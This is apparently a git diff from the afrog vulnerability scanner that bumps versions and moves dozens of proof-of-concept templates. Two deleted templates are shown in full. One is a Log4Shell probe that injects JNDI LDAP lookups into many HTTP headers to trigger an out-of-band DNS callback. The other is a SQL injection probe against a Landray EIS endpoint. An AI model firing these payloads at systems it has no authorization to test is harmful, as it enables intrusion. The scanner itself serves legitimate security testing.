diff --git a/pkg/config/banner.go b/pkg/config/banner.go index 802c6399..049487cd 100644 --- a/pkg/config/banner.go +++ b/pkg/config/banner.go @@ -9,7 +9,7 @@ import ( "github.com/zan8in/gologger" ) -const Version = "3.0.1" +const Version = "3.0.2" func InitBanner() { fmt.Printf("\r\n|\tA F 🐸 O G\t|") diff --git a/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml b/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml index cf8a3209..03e8c8d6 100644 --- a/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml +++ b/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml @@ -1,4 +1,4 @@ -id: CVE-2021-44228 +id: CVE-2021-44228-temp info: name: Apache Log4j2 Remote Code Injection @@ -18,6 +18,8 @@ info: created: 2023/07/02 set: + rand1: randomInt(111,999) + rand2: randomInt(111,999) oob: oob() oobDNS: oob.DNS hostname: request.url.host diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-22320.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-22320.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-22320.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-22320.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-23334.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-23334.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-23334.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-23334.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/CVE-2024-25600.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-25600.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/CVE-2024-25600.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-25600.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-25735.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-25735.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-25735.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-25735.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-27198.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-27198.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-27198.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-27198.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-27199.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-27199.yaml similarity index 100% rename from pocs/temp/afrog-pocs/cve/CVE-2024-27199.yaml rename to pocs/afrog-pocs/CVE/2024/CVE-2024-27199.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml rename to pocs/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml b/pocs/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml rename to pocs/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml rename to pocs/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml b/pocs/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml rename to pocs/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml b/pocs/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml rename to pocs/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml b/pocs/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml rename to pocs/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml b/pocs/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml rename to pocs/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml b/pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml rename to pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml b/pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml rename to pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml b/pocs/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml rename to pocs/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml b/pocs/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml rename to pocs/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml b/pocs/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml rename to pocs/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml b/pocs/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml rename to pocs/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml b/pocs/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml rename to pocs/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml b/pocs/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml rename to pocs/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml b/pocs/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml rename to pocs/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml rename to pocs/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml b/pocs/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml rename to pocs/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml rename to pocs/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml b/pocs/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml rename to pocs/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml b/pocs/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml rename to pocs/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml diff --git a/pocs/temp/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml b/pocs/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml similarity index 100% rename from pocs/temp/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml rename to pocs/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml diff --git a/pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml b/pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml deleted file mode 100644 index 03e8c8d6..00000000 --- a/pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2021-44228-temp - -info: - name: Apache Log4j2 Remote Code Injection - author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo,NLEG - severity: critical - verified: true - description: | - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. - reference: - - https://logging.apache.org/log4j/2.x/security.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - - https://www.lunasec.io/docs/blog/log4j-zero-day/ - - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a - solutions: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). - tags: cve,cve2021,rce,oast,log4j,injection,kev - created: 2023/07/02 - -set: - rand1: randomInt(111,999) - rand2: randomInt(111,999) - oob: oob() - oobDNS: oob.DNS - hostname: request.url.host -rules: - r0: - request: - raw: |- - POST / HTTP/1.1 - Host: {{hostname}} - Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://{{oobDNS}}} - Accept-Encoding: ${jndi:ldap://{{oobDNS}}} - Accept-Language: ${jndi:ldap://{{oobDNS}}} - Access-Control-Request-Headers: ${jndi:ldap://{{oobDNS}}} - Access-Control-Request-Method: ${jndi:ldap://{{oobDNS}}} - Authentication: Basic ${jndi:ldap://{{oobDNS}}} - Authentication: Bearer ${jndi:ldap://{{oobDNS}}} - Cookie: ${jndi:ldap://{{oobDNS}}} - Location: ${jndi:ldap://{{oobDNS}}} - Origin: ${jndi:ldap://{{oobDNS}}} - Referer: ${jndi:ldap://{{oobDNS}}} - Upgrade-Insecure-Requests: ${jndi:ldap://{{oobDNS}}} - User-Agent: ${jndi:ldap://{{oobDNS}}} - X-Api-Version: ${jndi:ldap://{{oobDNS}}} - X-CSRF-Token: ${jndi:ldap://{{oobDNS}}} - X-Druid-Comment: ${jndi:ldap://{{oobDNS}}} - X-Forwarded-For: ${jndi:ldap://{{oobDNS}}} - X-Origin: ${jndi:ldap://{{oobDNS}}} - expression: oobCheck(oob, oob.ProtocolDNS, 3) -expression: r0() diff --git a/pocs/temp/afrog-pocs/test/landray-eis-rpt-listreport-definefield-sqli.yaml b/pocs/temp/afrog-pocs/test/landray-eis-rpt-listreport-definefield-sqli.yaml deleted file mode 100644 index a22d4870..00000000 --- a/pocs/temp/afrog-pocs/test/landray-eis-rpt-listreport-definefield-sqli.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: landray-eis-rpt-listreport-definefield-sqli - -info: - name: 蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口SQL注入 - author: zan8in - severity: high - verified: false - description: |- - 蓝凌智慧协同平台eis集合了非常丰富的模块,满足组织企业在知识、协同、项目管理系统建设等需求。蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞 - fofa: icon_hash="953405444"||app="Landray-OA系统" - tags: landray,eis,sqli - created: 2024/03/05 - -rules: - r0: - request: - method: GET - path: /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ - expression: resposne.body.bcontains(b"Microsoft SQL Server") -expression: r0() diff --git a/pocs/temp/afrog-pocs/version b/pocs/temp/afrog-pocs/version index 384effd6..657b2ccf 100644 --- a/pocs/temp/afrog-pocs/version +++ b/pocs/temp/afrog-pocs/version @@ -1 +1 @@ -0.3.35 \ No newline at end of file +0.3.36 \ No newline at end of file diff --git a/pocs/v/afrog-pocs.zip b/pocs/v/afrog-pocs.zip index f1cd0c41..fd0cc609 100644 Binary files a/pocs/v/afrog-pocs.zip and b/pocs/v/afrog-pocs.zip differ diff --git a/pocs/v/afrog.version b/pocs/v/afrog.version index 13d683cc..d9c62ed9 100644 --- a/pocs/v/afrog.version +++ b/pocs/v/afrog.version @@ -1 +1 @@ -3.0.1 \ No newline at end of file +3.0.2 \ No newline at end of file diff --git a/pocs/v/version b/pocs/v/version index 384effd6..657b2ccf 100644 --- a/pocs/v/version +++ b/pocs/v/version @@ -1 +1 @@ -0.3.35 \ No newline at end of file +0.3.36 \ No newline at end of file